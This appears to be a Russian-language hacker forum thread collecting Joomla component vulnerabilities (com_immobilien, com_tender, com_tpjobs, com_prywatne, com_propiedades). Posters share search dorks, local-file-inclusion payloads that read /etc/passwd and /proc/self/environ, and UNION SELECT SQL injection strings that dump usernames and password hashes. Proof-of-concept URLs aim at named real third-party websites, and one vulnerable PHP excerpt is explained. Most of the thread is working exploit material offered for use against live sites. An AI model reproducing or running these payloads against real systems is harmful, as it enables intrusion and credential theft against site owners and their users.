Уязвимости Joomla/Mambo и компонентов

[z0mbyak]

Доброго времени суток, уважаемые форумчане.

Тип: LFI
Компонент: com_immobilien
Версия: Не знаю, тк шелл не залил
Найдена: 10.04.2011 by z0mbyak
Dork: inurl:"com_immobilien"

Vuln Code: Не искал)))

Link:
index.php?option=com_immobilien&controller=

Exploit:
../../../../../../../../../../../etc/passwd%00

PoC:

http://www.sundz-immobilien.de/index.php?option=com_immobilien&controller=../../../CREDITS.php%00

http://www.szaboimmobilien.de/index.php?option=com_immobilien&controller=../../../../../../../../../../../proc/self/environ%00

P.S Вроде не боян)

[Nightmare]

Так-же в плагине com_immobilien есть SQL inj в переменной id, без зависимостей от MQ + с выводом в цикле, что не может не радовать.

PoC:

http://www.echoamfreitag.at/index.php?option=com_immobilien&layout=read&view=s earch&Itemid=36&id=-3349+union+select+concat_ws(0x3A,username,password )+from+trc_users+--+0

Вывод не на экран, а в HTML коде смотрим все хеши.

Так-же вроде не боян, так что возможно ©

[z0mbyak]

И снова здравствуйте)

Тип: LFI
exploit: ../../../../../../../../../../etc/passwd%00

PoC:
http://www.moscow-tenders.ru/index.php?option=com_tender&controller=../../../../../../../../../../etc/passwd%00


Тип: Sql Inj

Вообще, массового я так и не нашел, но компонент очень дырявый)

PoC:

http://irp.omsk.info/index.php?option=com_tender&view=list&filter_type= category&filter_category%5B%5D=327&Itemid=5&comple ted=-1+union+select+1,2,3,4,5,concat(username,0x3a,pass word,0x3a,usertype),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36+from+jos_users+where+usertype='Super%20Admi nistrator'--

https://www.itbidding.com/index.php?option=com_tender&act=opening_tender&act ion=edit_opening_tender&gov_tender_id=-26+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--

P.S. Надеюсь не баян)))

[z0mbyak]

Доброго времени суток, уважаемые форумчане.

В данном компоненте уже находили BSQL-Inj
(http://www.exploit-db.com/exploits/10950)
Но есть и по проще варианты)

Например:

уязвимость в параметре id, при task=detailjob

Код:

Код:

//detailJob
function detailJob($option){
	global $mainframe;
	$user	=& JFactory::getUser();
	$id 	= JRequest::getVar('id', 0, 'get', 'string');

	if(empty($id))
	{
		$return	= JRoute::_('index.php?option=com_tpjobs');
		$mainframe->redirect( $return );	
	}

	$db 	= & JFactory::getDBO();		
	$query = "select a.*,comp_name,degree_level,pos_type,type_salary,g.country,i.industry,e.exp_name from #__tpjobs_job a".
	         " LEFT JOIN #__tpjobs_degree_level b ON a.id_degree_level = b.id".
			 " LEFT JOIN #__tpjobs_pos_type c ON a.id_pos_type = c.id".
			 " LEFT JOIN #__tpjobs_type_salary d ON a.id_salary_type = d.id".
			 " LEFT JOIN #__tpjobs_job_exp e ON a.id_job_exp = e.id".
			 " LEFT JOIN #__tpjobs_job_spec f ON a.id_job_spec = f.id".
			 " LEFT JOIN #__tpjobs_country g ON a.id_country = g.id". 
			 " LEFT JOIN #__tpjobs_employer h ON a.employer_id = h.user_id".
			 " LEFT JOIN #__tpjobs_industry i ON h.id_industry = i.id".
			 " where a.id = ".$id;	
	$db->setQuery( $query);
	
	$data = $db->loadObjectList();
	if(!count($data))
	{
		$return	= JRoute::_('index.php?option=com_tpjobs');
		$mainframe->redirect( $return );	
	}
	
	HTML_front_tpjobs::detailJob($data,$option);
}

В итоге нам нужно только подобрать кол-во колонок через order+by (за частую ~20-30)

POC:

http://bankihr.by/index.php?option=com_tpjobs&task=detailjob&id=1+un ion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30--

http://www.ingenjorstorget.se/index.php?option=com_tpjobs&task=detailjob&id=9999 99999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,group_concat%28username,0x3a,password,0x3a,usert ype%29,15,16,17,18,19,20,21,22,23,24,25+from+jos_u sers--

[z0mbyak]

Тип: Sql-Inj
Модуль: com_prywatne
Dork: inurl:"index.php?option=com_prywatne"

Данный компонент установлен только на одном сайте, но мало ли вдруг пригодится.

Exploit:

+union+select+group_concat(username,0x3a,password, 0x3a,usertype)+from+jos_users--

PoC:

http://infomedic.mentax.pl/old_site/index.php?option=com_prywatne&sid=30&mid=0&pid=34+ union+select+group_concat(username,0x3a,password,0 x3a,usertype)+from+jos_users--

[z0mbyak]

# Exploit Title: Joomla com_com_propiedades Multiple Vulnerabilities
# Date: 23.06.2011
# Author: z0mbyak
# Vendor or Software Link: find by yourself
# Version: Don't know
# Category: [remote, webapps.]
# Google dork: inurl:"index.php?option=com_propiedades"
# Tested on: FreeBSD

LFI Vulnerability:

exploit: ../../../../../../../../../../../../etc/passwd%00
VulnSite: http://www.arifmetika.com.ua/index.php?option=com_propiedades&controller=../../../../../../../../../../../etc/passwd%00

SQL-Inj Vulnerability:

exploit: null+union+select+1,2,3,4,5,6,7,88,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,277,28,29,30 ,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,61,62,63,64--&id_ciudad=4&id_sector=0
VulnSite: http://www.diplomat-kurgan.ru/index.php?option=com_propiedades&task=search&id_pr ovincia=null+union+select+1,2,3,4,5,6,7,88,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,277, 28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,61,62,63,6 4--&id_ciudad=4&id_sector=0

P.S. Вообще инъекцию я крутил через пост, так как поиск на аяксе, но специально для особо ленивых размещаю гет)

Специально для forum.antichat.ru и rdot.org/forum/

z0mbyak.

P.S.S. Я один эту тему развиваю?)))

[vp$]

раскрытие префикса
1.5.* http://joomla/index.php?option=com_contact&catid=10&filter_order =&filter_order_Dir=%60123aaaa%60&viewcache=0

[che]

а зачем вам знать префикс в жоомле?
при SQL-Inj передавайте вместо префикса #__ ,жоомла сама заменит на нужный префикс

[recfrf]

Цитата:

Сообщение от che

а зачем вам знать префикс в жоомле?
при SQL-Inj передавайте вместо префикса #__ ,жоомла сама заменит на нужный префикс

это как, разве такой запрос не даст Unknown column/table?

[che]

recfrf взгляни на скл запрос https://rdot.org/forum/showpost.php?p=16165&postcount=14, #__ это вишка жоомлы